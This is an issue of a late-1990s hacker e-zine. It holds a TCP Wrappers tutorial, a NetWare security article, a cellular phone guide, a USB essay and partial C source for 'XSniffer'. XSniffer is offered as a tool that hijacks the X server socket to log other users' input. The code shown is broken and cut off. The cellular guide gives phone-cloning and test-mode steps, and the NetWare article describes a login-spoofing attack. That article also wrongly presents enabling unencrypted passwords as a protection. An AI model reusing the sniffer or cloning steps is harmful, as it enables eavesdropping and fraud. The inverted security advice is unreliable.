Copy Link
Add to Bookmark
Report

Keen Veracity Issue 05

eZine's profile picture
Published in 
Keen Veracity
 · 5 years ago

  

****************************************************************************
____ __.
| |/ _|____ ____ ____
| <_/ __ \_/ __ \ / \
| | \ ___/\ ___/| | \
|____|__ \___ >\___ >___| /
\/ \/ \/ \/ A Legions Of the Underground Production
____ ____ .__ __ www.legions.org
\ \ / /________________ ____ |__|/ |_ ___.__.
\ Y // __ \_ __ \__ \ _/ ___\| \ __< | |
\ /\ ___/| | \// __ \\ \___| || | \___ | [Issue 5]
\___/ \___ >__| (____ /\___ >__||__| / ____|
\/ \/ \/ \/
014-NOV2
****************************************************************************

Hacking isn't about exploiting the system it's about knowing the system...



*---The Legions Staff---*

optiklenz - The man with the circuit board boxers
icer - is in search of Terabyte ethernet nirvana.
aphex -"I love rules, I think they're wicked"
lasik - " that's not an ATARI 2600 is it!?"
cap n crunch - "knows how to whistle"
sreality - "the original code pimp - betta' act like you know, bitch ;)"
HyperLogik/m0f0 Contact your local netherlands phone operator
Zyklon - taking over the world with a 8086 and a 300 baud modem
tip - brings his ALTAIR to nudy bars
[havoc] -
kM - kM- uses tape feeds to pimp his ho like a TX-0
defiant - "wheres my pay"
Duncan Silver-
DigiEbola - Of course I'm drunk, I ain't no stunt driver.
flemming - "not with that burnt out peice of shit"
Bronc Buster - the keyboard cowboy
lothos - "The Doctor is IN"
mercs -
Freshman/Icos
NetJammer -
dethl0k -coded a loop in his tie
NtWakO -Bugs in NT? Your shitting me....
x-empt -
Mnemonic - "thinks the truth is actually out there"
----o=============================================================================o-----

You know the world is fucked up when we start appointing professional
wrestlers into politics...


[x1]--> From the Editor [ optiklenz<--]
[x2] Mail Bag [ smtp <=-]
[x3]--> Tcp Wrappers [ lothos <--]
[x4] Novell Security [ NtWakO <=-]
[x5]--> Cellular Guide - [ downtime <--]
[x6] USB Theory of Utilization [ DigiEbola<=-]
[x7]--> XSniffer [ Mnemonic <--]
[x8] Long Distance Carriers [ Levine <=-]
[x9]--> STD phone codes [ foneman <--]
[x10]-> Telephony [ N6ARE <=-]
[x11] Trip to Comdex [ optiklenz<--]
[x12]-> In the News [ sources <=-]
[x13] Till next time [ optiklenz<--]



%%%%%%%%%%%%%%%%%%%%%%%%
\ From the Editor \-<optiklenz>
%%%%%%%%%%%%%%%%%%%%%%%%

Things are picking up as far as the whole Legions Interactive arrangement is concerned.
We are lately working with the Meta Fantasies corporation on a large programming
project This means due to all the work I'll be retiring my status as
chief editor of Keen Veracity. So from now on feel free to email all your
questions comments or article submissions to digi@wintermute.linux.tc
Keen Veracity will still be around but DigiEbola will be taking my place as the editor.
Rest assured each issue will still be chock-full of articles regarding computer
related data. As I established in the first part of the zine. "Hacking is not about
exploiting the system its about knowing the system."
A lot
of people out there login to their consoles, and get on irc and start
talking about what they are going to "own" next. Hacking isn't "owning"
the "net" (no one entity "owns" the net) its about building the net.
Why inflict distress on a system created by hackers? Take advantage of
what computers, and the network has to offer. Instead of sitting there
compiling exploits figure how the exploits works, and how it is connected with
the system, and how you can go about fixing it. But most of all figure out how the system
works because once you do you've compiled the greatest exploit known to man. Use
the system to your preference, and to the advantage of everyone else by circumventing the
system and sharing what you've learned with everyone else because the truth remains that
not everyone knows all there is to know. And the more information you share with others
the closer we become to being a even more knowledgeable brotherhood That's all for now.

The new site is up at http://www.legions.org

| |
|* shit to look out for*|
| |

[Look out for the official RootFest con press release in KV6]
Submit an article to Keen Veracity: digi@wintermute.linux.tc

===================================EOP===========================================


%%%%%%%%%%%%%%%%%%%%%%%%
\ mailbag \-<smtp>
%%%%%%%%%%%%%%%%%%%%%%%%


[mail]

David Kurby

You guys are great. I've heard a lot about the things
you do, and I think its really cool. Just want you to
know you have my respect, and support. Looking forward
to your next magazine release.

<dl@mindless.com>

[responce]
yeah, sure kurb.. whatever...

------------------------------------
[mail] <subliminal-> Can you teach me how to hack?

[responce]

Sure, grab an axe and let me know when your ready.
------------------------------------



[mail] <frolik> Whats up with the site?

[responce]
We're currently switching name servers, and getting our new
equipment configured. Check out www.t00ned.org/optik, and I'll
keep you posted.

------------------------------------
[mail] <plankton>
Do you still hack?

[responce]

Well it depends on your analogue of hacking. By the authentic
formalization I "hack" everyday. Whether I'm coding, or doing
Network checks it's still hacking. Hacking has little to do
with the "illegal" entry of computer systems apart from the
Technical, and systematic aspect of it. Illegally accessing a system
for no intended reason is not something I advocate or
advise performing. What I suggest achieving is going out, and
learning, and questioning the system itself before trying to exploit it.
And even once you feel you have a broad knowledge of the system make sure
you use what you know to build things, and not fuck things up.
System admins who are affected by crackers turn to hackers in
order to secure their systems. They turn to the philosophies,
documents, and programs written by "hackers"... Let's not
make them look the other way. We are here, and we are skilled.
What your brain dead system administrator can do in a week we can
accomplish in a matter of minutes more practically. That's the message
that should be put across. One of positively not one that says "Were
going to take you down."
Read my introduction in Keen Veracity
3 I go into greater detail on the subject at hand.
http://www.t00ned.org/optik/kv/kv3.txt

-Steve Stakton <optiklenz>

[the below was sent to me by a writer for the Associated Press]


Hi Optik,

[question]
I was wondering if you could answer a question or two. This lady
came into the newsroom yesterday with a printout of a strang icon she
found on her AOL instant messenger screen. Apparently it was put there
by some kind of virus or trojan horse attached to a FateX program that
her son downloaded. I understand from what little I could find on this that
this is a "punter" program. What, exactly is a punter program? She says this
thing totally screwed up her computer, including her DVD drive and she had to trash
it and get a new one. Also, when this happened someone masqueraded as one of the
people on her "buddy list" and she chatted with them for hours before finding out
it wasn't who she thought it was.

[responce]

FaxeX is an AOL Denial of service program based on AOHell, which was the
pioneer for AOL programs of its kind. This program embodies "attack"
options such as "phishers", "punters", "scrollers", and other options
that really only cause minor damage. These programs are created by
teens whose coding experience in most cases do not go beyond visual
basic. The programs that these juveniles create are made in poor taste,
and the interfaces are so poorly put together it is obvious the authors
lack any significant programming knowledge. For the most part
The authors create these programs for publicity. (Don't know if that's
much coming from the AOL community.) At any rate it isn't very hard to
please the gimpy uses of the AOL citizenry (most of them anyhow) that
is the largest concern AOL or anyone using it should have. These programs
are downloaded by the thousands generally utilized by users who cant very
well operate their computer system let alone be given access to a application
of harassment (at which very little computer science is needed to operate).
A worse case scenario would be someone using a "phisher" to obtain a user
password. Even then it would take someone extremely dense to fall for it.
A phisher is basically an instant message sent out to multiple users giving
them a bull shit line such as "Hi, I work with AOL our server is being updated
please message back with your Login and password. Failure to comply will result
in having to re-register"
A message like that if indeed from AOL will never
be sent directly to the user using something as open as an IM (Instant Message),
but most likely via email. Now as for punters these are tools that pose no real
threat except for the fact that they are really annoying. All they do is send
you a massive amount of messages till you are forced to log off, and restart
your AOL session (ergo the term punt). I seriously doubt the program FateX
itself was to blame for the system mishap. Maybe it was in an indirect manner,
but a virus downloaded by her son would be a more illusive reason. Because
AOL is a harbor for lamers, and the sort most of the programs sent out or
downloaded in relation to AOL are most likely to be infected with some sort
of virus. MY suggestion would be to download a virus scanner, such as Nortan
Anti Virus 4.0 by Symantec or McAfee anti virus software.

take care,

Steve Stakton <optiklenz>
===================================EOF===========================================


%%%%%%%%%%%%%%%%%%%%%%%%
\ Tcp Wrappers \-<lothos>
%%%%%%%%%%%%%%%%%%%%%%%%
An Introduction to TCP Wrappers
lothos lothos@thepentagon.com


The TCP Wrappers program, from Wietse Venema, is an easy to use
utility for host and network based access control that does logging for
services started by inetd(8). TCP Wrappers will allow you to finger
people who connect to you, display a banner for incoming telnet
connections, or run an ambiguous command, and will also prevent some
spoofing attacks by making sure the IP address and hostname match.

_Getting TCP Wrappers_

TCP Wrappers is shipped with many flavors of unix, including
BSD/OS, OpenBSD, and possibly other *BSD flavors. It comes standard with
Linux, but is rarely configured correctly.
You can get tcp_wrappers from
ftp://ftp.win.tue.nl/pub/security/tcp_wrappers_7.6.tar.gz, or from
ftp://coast.cs.purdue.edu/pub/tools/tcp_wrappers. Version 7.6 is
the latest as of this writing.

_Installing TCP Wrappers_

The advanced way to install tcp_wrappers, as instructed in the
readme, is actually easier, so I will describe that way to install.

1. Copy the current /etc/inetd.conf to another location as a back up, such
as /etc/inetd.conf.dist.

2. Edit tcpwrapper's Makefile to show where the real daemon's are located.
Under OpenBSD I would uncomment REAL_DAEMON_DIR=/usr/libexec.

3. If you want the language extension enabled, uncomment the following
line:

#STYLE = -DPROCESS_OPTIONS # Enable language extensions.

I recommend uncommenting this line, which makes access control easier by
allowing you to specify access control in one file, instead of two, and
also allows you to use the extra features, including banners and commands.

4. Next, compile tcpwrappers. If you simply type 'make' it will output an
error message. You must specify the system type you have, as specified by
the error message.

_Configuring /etc/inetd.conf_

You must edit your inetd.conf file in order to use tcpwrappers.
Change it to specify the location of tcpd.

telnet stream tcp nowait root /usr/libexec/telnetd telnetd

should be changed to:

telnet stream tcp nowait root /usr/libexec/tcpd telnetd

or the location of your tcpd daemon. A 'kill -HUP inetd' will update
these changes.

_Access Control_

Access is controlled by two files, /etc/hosts.allow and
/etc/hosts.deny. If you followed my instructions above, you will only
need the /etc/hosts.allow file.

The format of this file is:

daemons : client_host_list : option : option


A simple example to demonstrate this:

fingerd : local.machine.com : ALLOW

NOTE: You should use ip addresses for increased security.

TCP Wrappers should log to MAIL.INFO by default, but this can be changed
in the Makefile. I have also set up my /etc/syslog.conf file so that the logs
go to both a file and to /dev/ttyC7 so I can read them in real time.

_Advanced Options_

Banners

Banners display a message to someone connecting to your machine. You
need to set up a directory for them, I have mine set up in /etc/Banners.
Using banners, you can have separate banners for allowed hosts and denied
hosts by using two directories (/etc/Banners/allowed/, for example)

An example of a banner:

Trying 192.168.0.0...
Connected to 192.168.0.0.
Escape character is '^]'.

WARNING:

This computer system is for authorized users only. Any unauthorized
access will be logged and prosecuted.

You have been logged as: root@phear.com

OpenBSD/i386 (phear) (ttyp5)

login:


You can make your banners as simple or complex as you'd like. %c will
return username@hostname info, assuming the other computer has identd
running. Some expansions that can be used are:

Token Mnemonic Expands to:

%a address ip address of client.
%c client info username@hostname
%s server info daemon@host.

There are many more options, these are the ones I use the most frequently.

A denied host will display:

Trying 192.168.0.0...
Connected to 192.168.0.0.
Escape character is '^]'.
Connection closed by foreign host.

You can also optionally specify a banner to display for deny as well by
specifying a banner to use, to provide more information to the user about
why the access is denied.

If you want to allow fingerd from local hosts, and want external hosts
to be denied with a message, you would configure /etc/hosts.allow like so:

fingerd : LOCAL : allow
fingerd : all : twist /path/to/message

The twist option will run a specified shell command.

You can also specify that tcpd finger anyone attempting to connect to
your machine. We do not finger any finger connections, to prevent a
continuous loop where the remote machine also fingers connections.

all EXCEPT fingerd : bad.com : (/usr/local/bin/safe_finger -l @%h | \
/bin/mailx -s %d-%h security@phear.com) &

You can split a command over two or more lines by using the backslash
character. safe_finger is used because it filters out any nasty control
characters. This command will mail the results of finger @bad.com to the
user of your choice.

_Checking Access Control Settings_

Besides coming with safe_finger, tcpwrappers also comes with two
utilities that check your access control. From tcpdchk(8): tcpdchk examines
your tcp wrapper configuration and reports all potential and real problems
it can find.
tcpdmatch will find a match in the access tables and tell you if
it's allowed or denied, as well as displaying any banners you may have.
This is a great way to see if your access files are thorough enough.

_Limitations of tcpwrappers_

TCP Wrappers is vulnerable to IP spoofing because it uses IP addresses
for host authentication. It will only provide authentication for daemons
started by inetd(8), and only provides limited support for UDP services.
There is a patch that allows tcpwrappers to be used with sendmail 8.8.8,
but IMHO the wrapper that comes with TIS Firewall Tool Kit is much better.
www.tis.com for more info.

_Sources and More Info_

Read the man pages for more info: tcpd(8), tcpdchk(8),
tcpdmatch(8), hosts_access(5), and hosts_options(5). There is also
information about tcpwrappers in Practical Unix and Internet Security by
Simson Garfinkel and Gene Spafford.


Shoutouts: Legions of the Underground, Tara, Stratus, MostHateD, [gH],
noderatz.
===================================EOF===========================================



%%%%%%%%%%%%%%%%%%%%%%%%
\ Novell Security \-<Ntwak0>
%%%%%%%%%%%%%%%%%%%%%%%%

Check out the Con webcast
PhreakNic: http://209.251.14.140:7070/ramgen/pn2_how2.rm


Securing / Auditing Novell

First Simple Rule Upgrade to NetWare 4.x this will defeat many of the attacks
NetWare provides no audit trail
Your site's security policy should include a process for Administrator approval of user
ID creation. Security Administration procedures, which your site security policy should
govern and of which you keep a manual, record should include the following:

* Reactivating disabled Ids
* Reactivating forgotten passwords
* Removing access when a user is terminated or has changed job functions
* Monitoring changes to access privileges and entitlements the supervisor assigns
to users to ensure that changes are appropriate for the user
* Periodic review of user access privileges and entitlements to ensure that access
level are still appropriate

Starting to check your installation security

Many Hacker attacks exploit common-sense failings of the system, you should be sure that
you secure your NetWare network. NetWare security program provides information on how the
supervisor installed security on the system. You can also use the security program to
perform a compliance review. Only the supervisor and users with Supervisor equivalent Ids
can run the security program.

Physically secure the server
* You should at a minimum control access to the server room with key access, preferably
by some type of electronic key card access with track.
* If the server has a door with a lock on the server itself lock the door and limit
access to the key. Secure the keyboard within a cabinet or other locked area to prevent
command entry directly into the operating system.
* If you only load NLMs from SYS:SYSTEM directory, use the SECURE CONSOLE command to
prevent loading NLMs from the floppy or other location.
Secure important files off-line and protecting scripts
* You should always secure your most important files off-line and off-site.
You most important files refer to startup.ncf, autoexec.ncf, the NetWare bindary or the NDS.
* You should copy all the system log-in scripts, container scripts, and all the user or other
log-in scripts off-line. NetWare stores the log-in scripts in the SYS:_NETWARE directory
a hacker can edit these files using edit.nlm. File with extensions such .000. these files
are probably log-in scripts.
* You should compile a list of network-loadable modules and their version numbers, and
a list of files from the SYS:LOGIN, SYS:PUBLIC, and SYS:SYSTEM directories, you should
periodically check your file list against the originals stored on the computers themselves
to ensure that no one has altered any of the files
* You should create a written list of all users and groups on your network, use syscon or
another network tool to create a written list of users, groups, access levels, check the
list against a report from Novell security program., check for ODD accounts with Supervisor
access such as GUEST or PRINTER
Monitor the Console/Administrator
* Just as you should physically secure the console, you should ensure that the network
logs all activities users perform on the console. To log console entire use the conlog.nlm
program the log will be recorded in SYS:ETC\console.log. When you check the console you
should also press the UP-ARROW key befor you begin to enter your commands at the console.
Doing so will show what commands the last user entered at the console.
* Run the securefx.nlm module after the security breach and you get this message : Security
breach against station <connection number> DETECTED. The securefx.nlm will writes its error message to an error log.
* You should avoid using the Supervisor account for any except the most critical of access
activities. If you have not enabled packet signatures someone could use a program that
spoofs user packets and gain access to the server as Supervisor.

Use Packet signature

* The NetWare login protocol consists of three packet exchanges between the server
and the client. First the client sends a request for a login key, the server generates
a random eight byte value and sends it to the client. Then the client sends a request
for for the user ID of the user loging in, the server looks up the user ID in the
bindery and sends it to the client.
Finally, the client computes X=hash(UID,password) and Y=hash(X,login key) andsends
the result to the server. The server retrieves X'=hash(UID,password) stored in the
bindery and computes Y'=hash(X',login key). If Y=Y', the client is granted access as
the user. If both the client and server agree to use packet signatures, both parties
then compute Z=hash(X,c) (where c is some constant value) which they will use as a
shared secret for authentication.
The following chart gives a graphical representation of the protocol:
Client Server
Request Login Key ------------------------------------------------>
<------------------------------------------------ Login Key
Request User ID ------------------------------------------------>
<------------------------------------------------ UID of client
Compute X=hash(UID,password) Compute X'=hash(UID,password) Compute Y=hash(X,login key)
Compute Y'=hash(X,login key)
Request Authentication ------------------------------------------------> If
Y=Y', Access is Granted
Comput Z=hash(X,c) Compute Z=hash(X,c)
When a user Alice logs in, an attacker Bob can interrupt this protocol sequence and gain
access as Alice without knowing her password. In order for the procedure to work, Bob must
be on a network where he can observe the traffic between Alice and the server, and Bob must
be able to respond to
Alice's requests faster than the server.
First Bob sends a request to the server to login, and the server sends Bob a login key R".
Then Alice requests a login key from the server, Bob sees the request and spoofs a reply as
the server which sends Alice R"
as her login key. The server receives Alice's request and
sends her R as her login key,
when Alice receives R she will discard it as a duplicate. Alice requests her UID from the
server, and the server responds with her UID. Alice computes X=hash(UID,password) and
Y=hash(X,R") and sends the result to the server. The server computes Y'=hash(X,R), since
Y' is not equal to Y, Alice is denied
access. Meanwhile, Bob saw Alice's Y submitted to the server, he retrieves this value from
the network and sends it to the server for authentication as Alice. The server computes
Y"
=hash(X,R"), sice Y = Y" Bob is granted access as Alice. Bob requests not to sign packets,
if the server does not require all clients to sign packets, then Bob is allowed to masqurade
as Alice.
Alice Bob Server
Requests Login Key R" ---->
<---- Sends R"
to Bob
Requests Login Key R ----------------------------------->
<---- Sends R" to Alice
<----------------------------------- Sends R to Alice
Receives R"
first
Discards R as a duplicate
Requests UID for Alice ----------------------------------->
<----------------------------------- Sends UID of Alice
Computes X=hash(UID,password)
Computes Y=hash(X,R")
Sends Y to the server -----------------------------------> Computes
Y'=hash(X,R)
Sees Y and retrieves it. Y != Y',
access is denied
Sends Y for ---> Computes
authentication Y"
=hash(X,R")
Y"
=Y, access is
granted
Refuses to sign packets If all clients are
not REQUIRED to
sign packets,
access is granted.
There may be a second attacker, Joe, waiting for Alice to log in without using packet
signatures. As a result, Joe can highjack Bob's connection as Alice.
To defend against this attack, set the NCP PACKET SIGNATURE LEVEL option to 3 in the server's
AUTOEXEC.NCF file. Setting this option to 3 at the client will have no effect, the option MUST
be set at the server.
The Netware default for packet signatures is 2 at the server and client. If the hacker wants
to use a hacking tool which forges packets, the hacker can try to set the worksation signature
level to 0 (no packets required) within the computer client net.cfg. If the server is set to
1 or 0 the hacker will log in right to the network and defeat the entier purpose of the packet
signatures.

Rconsole
* The rconsole utility lets the Supervisor monitor the network at the server-level remotly.
To log into rconsole the Supervisor must enter an rconsole password, a hacker using a sniffer
can sniffer the password and crack it.
* Do not try to use the switch /P=password switch to limit the rconsole password to just the
Supervisor password, if you use "LOAD REMOTE /P="Supervisor password you will get into
rconsole but the rconsole password is now "/P".
* Worse of the hacker gains access to your autoexec.ncf file the rconsole pawword is visible
in plain text.
* Check the name and location of rconsole, rconsole.exe is located in the SYS:SYSTEM directory
by default in 3.11, in 3,12, 4.1 rconsole is in SYS:SYSTEM and SYS:PUBLIC. You should limit
access to the file only by the Administrator.
Move all Netware configuration files to secure location
* By default Netware places all Netware configuration files (ncf) within the SYS:SYSTEM
directory. Because most hackers know this, their first goal to access the SYSTEM directory
and modify the ncf files. Your best defense against hackers attacking your configuration files
is to move the files to a more secure location
* Put your autoexec.ncf in the same location as your sever.exe file. If a hacker
compromises the access to the SYS:SYSTEM directory, you will at least have protected
the autoexec.ncf file.
* A simple trick you can do is to keep a false autoexec.ncf file in the SYS:SYSTEM with a
false rconsole password.

Remove PUBLIC from ROOT in 4.1's NDS
* Unlike 3.1, 4.1 includes a single trustee which essentially grants everyone read
access to every directory on the system. To prevent all users from seeing the entire
directory tree remove the PUBLIC Trustee from the ROOT object's Trustee list.

Default system accounts
* When you install Netware the installation creates two or four default accounts
:Supervisor and the guest in netware 3.x and Supervisor guest admin and user_template
in netware 4.x. When the network creates the default accounts none of the default
account has password. For example many installation will use a printer account or
LASERPRINTER account with no passowrd on them.

Hacking and defending passwords
* In Netware 2.x 3.x the bindery file's attributes are hidden and system and both
located on the SYS:SYSTEM subditectory, in 4.x they are located in SYS:_NETWARE
* 2.x net$bind.sys, net#bval.sys this file conatin the paswords
* 3.x net$boj.sys, net$prop.sys, net$val.sys this file conatin the paswords
* 4.x value.nds part of the NDS
block.nds part of the NDS
entry.nds part of the NDS
partitio.nds type of NDS partition (replica master, etc)
mls.000 License
vallincen.dat Licence validation
If the intrusion detection system IDS is disabled the hacker can use a brute force
to crack the password..
* Set the unencrypted option by entering the following line at the console or adding
it to autoexec.ncf SET ALLOW UNENCRYPTED PASSWORD=ON <Enter>
* The best protection against dictionary attacks is to force users to regularly change
their passwords.
* Periodically run security or another system analysis program for a somaple passwords check,
and instruct the users to use eight-letter minimum passowrds which include numerals, symbols
and letters.

===================================EOF===========================================

%%%%%%%%%%%%%%%%%%%%%%%%
\ Cellular Guide \-<downtime>
%%%%%%%%%%%%%%%%%%%%%%%%




Contents
~~~~~~~~

1) Some of the Cellular Phone Basics
2) The reason for the name Cellular.
3) Review of the Cellular System.
4) What goes on during Cellular Calling.
5) Cellular Cloning and Other Features.
6) Basic Test Mode Programming
7) What kind of Cellular is Best?
8) Where is the Cellular Technology Going?
9) Closing
_____________________________________________________________________________
" " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " "

Introduction
~~~~~~~~~~~~

We have all seen them, heard about them, and most people use them. What am I
talking about? None other than the Cellular Phone. One of the most interesting
things ever that is associated with the Phreaking Community. This guide will
not tell you how to do illegal things with your cell but this will give you a
basic view of how the cellular phone works. Enjoy!
_____________________________________________________________________________
"
" " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " "

1) Some of the Cellular Phone Basics

The main thing to remember about a cellular phone is that it is a
radio. It is basically like a hand held walkie talkie except with a cellular
phone you have alot more capabilities and can talk and listen at the same
time. Remember though that when you are talking on a cellular phone what you
say may and possibly will be monitored very easily. There are two main types
of Cellular Phones Analog and Digital.

1) Analog: On this the audio is modulated directly onto a carrier
2) Digital: On Digital, these are converted to digitized samples.
These are transmitted as 1's and 0's. Then it is converted
back to voltage so you get the audio signal.

Each Cellular Phone has to identify itself to its cell site before
service is allowed. They are identified by what is known as an ESN and a MIN.

1) ESN: This stands for Electronic Serial Number. This is a 32-bit
Binary Number if I am not mistaken.
2) MIN: Mobile Identification Number. This is the phone number of the
Cellular Phone. 10 digits including area code and all.
_____________________________________________________________________________
" " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " "

2) The Reason for the name Cellular.

The reason for this is that in each city the Cellular Phone System is
divided into smaller sections also referred to as cells. These usually have an
antenna on top of a high surface that gives out strong signals therefore giving
you clear service.
_____________________________________________________________________________
"
" " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " "

3) Review of the Cellular System.

The main system operating in the United States is the AMPS, Advanced
Mobile Phone System. The AMPS are composed of two different things:

1) EAMPS: This system has 832 channels.
2) NAMPS: This system has three times the amount with very clear
signals.

All these have 42 channels that are used to setup calls the rest are
for talking over the Cellular Phone.
_____________________________________________________________________________
" " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " "

4) What goes on during Cellular Calling.

Just imagine if you are stranded somewhere or possibly just want to
use your cellular phone to call someone. Have you ever wondered how it worked?
Why it worked? If so then I will explain how and why in this section here.
Enjoy!

1) Scan Channels: In this step the cellular phone scans for the
closest cell site near you so that you can get
the strongest signals possible due to your location
at the moment.

2) Choose Strongest: As stated above the cellular phone finds the
closest site to give you the best performance.

3) Send Message: The phone sends a short message to the cell site
verifying the MIN, ESN, and the number that you
have just entered to call.

4) Assign Channel: After verifying the above information and they
know that you are a legal paying customer, the
base assigns a mesage to your phone, telling it
where the conversation is.

5) Talk: Phone then gets on that channel and begins to ring. Then
you begin to talk like normal. The easiest step of them all.

_____________________________________________________________________________
"
" " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " "

5) Cellular Cloning and Other Features.

Cellular Cloning is one of the newest and more popular things going
on now a days. What you are basically doing is programming someone else's
MIN and ESN into your phone in the process of fooling your cellsite into
thinking that you are actually them. Is this legal? Well it depends on which
way you use it. If you use it to clone one of your own phones where you can
have two phones exactly the same then no, but if you are cloning someone
else's then yes it is very illegal. The philosophy of a cellular phone phreak
as stated in another text written by John Markoff is to push the machines as
far as they would go. The possibilites with a cellular phone are practically
endless. You can make one into a scanner as well as many other things.

The first step of being able to do ANY of this is getting the cellular
phone into what people call test mode. This is where you can practically change
the whole phone's features. The main way to get into this is to crack the access
code. There is a good site that deals with that at the following URL:
http://www.radiophone.com They have great information. Another way to get a
cellular phone is by taking the battery pack off of the back and look in the
lower corner. Here you will see some little prongs, you can get a small piece
of tin foil and place it in the center of the prong like so: |*|
then put the battery pack back on the back of the phone. Then turn the phone
on and when you turn it on you should see an array of flashing numbers. If
so you are in luck because you are in test mode! :)~

_____________________________________________________________________________
" " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " "

6) Basic Test Mode Programming

This section will tell you what to do once you get into the test mode.
This part comes from 1993 Cellular Subscriber Technical Training Manual. I
give full credit to them for this information. I am not going to include all
of it because it would take forever. Here are some of the basics. Enjoy!

32# = clear the phone
38# = displays the ESN
55# = test mode programming
01# = restart
13# = power off
16# = setup
18# = send NAM
34# = turn DTMF off
61# ESN transfer

That is jsut some of the very basics. Of course there is alot more
and if I ever write another article with Cellular Phones I will include some
more. Don't want to get very much ahead of ourselves. :)
_____________________________________________________________________________
"
" " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " "

7) What kind of Cellular is Best?

There are different kinds of cellular phones for different kind of
people. Me personally I have experience so far with only Motorola. I plan to
get a Nokia soon. Nokia are very advanced and have many options. There is also
the OKI those have been stated to be good. The one that interests me at the
moment are these new ones that are Java based. If you would like to read more
about these go to the following URL:

http://www.nortel.com/cool/norteledge/edge298/N._IP_N.html

But as stated above many people like many different things, there is
also a new Motorla that is the IDEN I10000. These have two-way radio and
alphanumeric pager in one. These weigh in at around 5 oz. as well.
They also include: One touch call back, a speakerphone, and a multilanguage
operation that displays prompts in one to four different languages. For more
information on this you can call: 1.800.453.0920
_____________________________________________________________________________
" " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " "

8) Where is the Cellular Technology Going?

This is a very interesting thing to think about including all the
things that they already have out and available at this point in time. There
is no way to actually predict what is going to come out next due to people
having new ideas with each and every passing day. It should be an interesting
thing to think forward about. Whatever it is, it will turn heads I am sure!
_____________________________________________________________________________
"
" " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " "

9) Closing

We have seemed to read the end of this guide. I hope this has been
an informative source and you enjoyed it. I will probably write another cellular
guide in the future but am not sure at the moment. Remember "Push the Machine
as Far as it will Go!"
=)
_____________________________________________________________________________
" " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " "






===================================EOF===========================================

%%%%%%%%%%%%%%%%%%%%%%%%
\ USB- Where it's going\-<Digi Ebola>
%%%%%%%%%%%%%%%%%%%%%%%%


In the struggle for better peripheal technology, there can always be improvementThese days,
speed is a issue as well as easy usability. The USB or
Universal Serial Bus is a product of this struggle. With USB, you can connect
a virtual plethora of devices, such as cameras, scanners, and drives. You can
even go as far as running a network off USB. This new technology is the wave of
the future in more ways then one. In this article, I will outline advantages
of the Universal Serial Bus as well as uses that go beyond the standard fare.

==========
Advantages
==========

USB is fast. Much faster then the standard serial port. 12 megabit per second speed.
Also, in addition to the speed, you can have 120+ devices on one USB port Most of the
devices are hot-swapable, allowing them to initialize without a reboot of the system.
The USB has excellant versitility, with its digital connection, allowing you to
uses speakers, telephones, and attach to networks.

=======
Uses
=======

Now while the many kinds of devices are being developed for USB, the world seemsslow
on implementing it. Imagine a house, that is ran by computer. This is the
founding technology that will connect it. You could design a entire security
system based on USB and have it all controlled thru a terminal. With standard
parts availiable out of electronic catalogs, you can construct your security
system, using laser diodes, electronic locks, thumbprint id, and cameras. With
the speed USB offers, there is no way better to integrate everything. With a
maximum of 127 devices, it is suited to almost anysize house. If ran on a linux terminal,
you could even connect remotely to enable or disable any device in thesystem. Now, most
people do not bother with hi-tech security in the homes, but you could even extend the
system to home appliances, lights and windows. Think you left your oven on? Telnet in
and shut it off. With the internet, and
personal communication merging, you could even use a cgi interface to control
your home from the web, as well as down load images of the kids sleeping while
you are away, or checking to make sure the dog is still alive.

=================================
The Future of USB, and Hacking It
=================================
With the integration of USB is complete, do not be surprised if the things such
as standard telephones, tvs, and radios utilize it. Entire computer systems
can be built off the technology. With this in mind, for the average person on
the go, the laptop will serve not only as it does now, a portable office, but as a
full fledged media tool and personal communicator. This will open so many
avenues for the people of the digital age. One scenario is, you go over to a
a friends, and wish to exchange files. You set your laptop on the table, and
whip out a cable, and plug it into the Intranet via wall socket. Instantly,
the system assimulates you like you were meant to be there. You now have access
to the entire system, including the phone, and media services.

This technology will bring many avenues to explore as well as secure. If phones
are implemented, it will take phreaking to a whole new level. Entire houses will be
comprimised, as well as the security systems mentioned above. The job of the
security consultant or the cracker will get more interesting. While all this
sounds corny, society wants convienence, and with that brings security holes
and even flaws. I urge anyone with the skills to start developing USB periphealsand
if your like me, a security system. Integrate your house, your car and even
your dog with USB.

===================================EOF===========================================

%%%%%%%%%%%%%%%%%%%%%%%%
\ XSniffer \-<Mnemonic>
%%%%%%%%%%%%%%%%%%%%%%%%


/*XSniffer is an x server sniffer.
It listens to a port. It reads a line at a time from the
port and saves the data to log.txt, and then outputs the data to
Y0. Works with Redhat 4.2 and 4.0. To change everything back to
normal, mv Y0 X0. For XSniffer to work, rename X0 to Y0 and
rename XSniffer to Y0 in the /tmp/.X11-unix/ directory.*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#includes <sys/socket.h> //XSniffer copyright 1998 Mnemonic
#include <unistd.h> //what's up Blood?????
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <dos.h>
#include <fcntl.h>

#define Y0 "
/tmp/X11-unix/Y0"
#define log "
log.txt"

void loop();

int sock_readln(sockfd, str, count)
int sockfd;
char *str;
size_t count;
{
int thisRead;
int total = 0;
char *curr;
char charln = 0;

curr = str;
while (charln != 10)
{
thisRead = read(sockfd, &charln, 1);

if (thisRead <= 0)
{
return(-1); //you overflowed the buffer, buddy
}
if ((charln != 10) && (charln != 13 ))
{
if (total < count)
{

curr[0] = charln;
curr++;
total++;
}
else
return(-1);
}
}
curr[0] = 0;
return(total);
}

int main(argc, argv)
int argc;
char **argv;
{

int sock;
int newsock;
int inr;
int connected;
unsigned short port;
long int lport;
struct sockaddr_in address;
char buffer[1024];
char newbuff[1024];
char *errpos;

if (argc != 2)
{
printf("
just type in the freaking port next time");
exit(-1);
}

lport = strtol(argv[1], &errpos, 0);
port = htons(lport);

memset((char *) &address, 0, sizeof(address));
address.sin_family = AF_INET;
address.sin_port = port;
address.sin_addr.s_addr = htonl(INADDR_ANY);

